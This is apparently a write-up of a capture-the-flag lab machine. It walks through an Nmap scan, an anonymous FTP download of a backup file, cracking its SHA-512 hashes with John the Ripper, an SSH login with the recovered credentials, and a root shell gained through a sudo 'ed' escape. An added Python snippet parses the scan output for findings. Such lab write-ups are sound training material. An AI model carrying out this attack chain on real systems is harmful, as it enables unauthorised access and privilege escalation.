Network Scanning
In the first step of scanning I used the “arp-scan -l” command to perform a local network scan and find out the IP address of the target machine.
Command : arp-scan -l
After getting the target machine’s IP address I scanned the target for open ports using Nmap.
Command : nmap -A -T4 -p- -oN nmap 192.168.0.175
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-04 22:59 IST
Nmap scan report for 192.168.0.175
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.0.175:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
| 256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_ 256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds
From the scan result I found that port 21 (FTP) is open with anonymous login enabled.
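As an added example (not part of the original writeup), a small Python parser over the Nmap output above: it pulls out the open services and turns the ftp-anon script output into findings, namely that anonymous login is enabled and which file it exposes. The NMAP_OUTPUT excerpt is reconstructed from the scan above, and the regex only covers the port-line format Nmap prints.

```python
import re

# Constructed excerpt of the Nmap -A output shown in the writeup.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
|   2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
"""

# Matches an Nmap port line: "<port>/<proto> <state> <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Return one dict per port line; NSE script lines (those starting
    with '|') that follow a port are attached to it as 'notes'."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            services.append({"port": int(port), "proto": proto, "state": state,
                             "service": name, "version": version.strip(),
                             "notes": []})
        elif line.startswith("|") and services:
            # Strip the "| " / "|_" prefix Nmap puts on script output.
            services[-1]["notes"].append(line.lstrip("|_ ").strip())
    return services


def findings(services):
    """Flag the misconfiguration this box exposes: anonymous FTP, plus
    every directory entry the ftp-anon script listed through it."""
    out = []
    for s in services:
        if s["state"] != "open" or s["service"] != "ftp":
            continue
        tag = f"{s['port']}/{s['proto']}"
        if any("Anonymous FTP login allowed" in n for n in s["notes"]):
            out.append(f"{tag}: anonymous FTP login enabled")
        for entry in s["notes"]:
            if entry.startswith("-") or entry.startswith("d"):  # ls -l style line
                out.append(f"{tag}: file exposed via anonymous FTP: {entry.split()[-1]}")
    return out
```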
Enumeration / Reconnaissance
Let’s log in with the username anonymous and any random password.
Command : ftp 192.168.0.175
Here I found one backup file.
I transferred the backup file to my machine.
Command : get backup
Now the backup file is transferred to my machine.
Password Cracking
The file contains SHA-512 crypt ($6$) hashes, so we can crack them using John the Ripper.
Command : john --wordlist=/usr/share/wordlists/rockyou.txt backup --format=sha512crypt
Here I found the credentials: Username = sunset, Password = cheer14
As SSH port 22 was open, I used these credentials to log in.
Command : ssh sunset@192.168.0.175
Wow!! Now I have a remote shell on the target box.
Now I am the sunset user.
Command : ls
Privilege Escalation
Now I used “sudo -l”, which lists the commands we can execute with sudo.
Command : sudo -l
Here I found the binary “/usr/bin/ed” listed.
Then I searched for ed privilege escalation and found one article:
https://www.hackingarticles.in/linux-for-pentester-ed-privilege-escalation/
Then I looked up ed on GTFOBins and found the exploit there.
So I executed the “!/bin/bash” command and got a root shell 🙂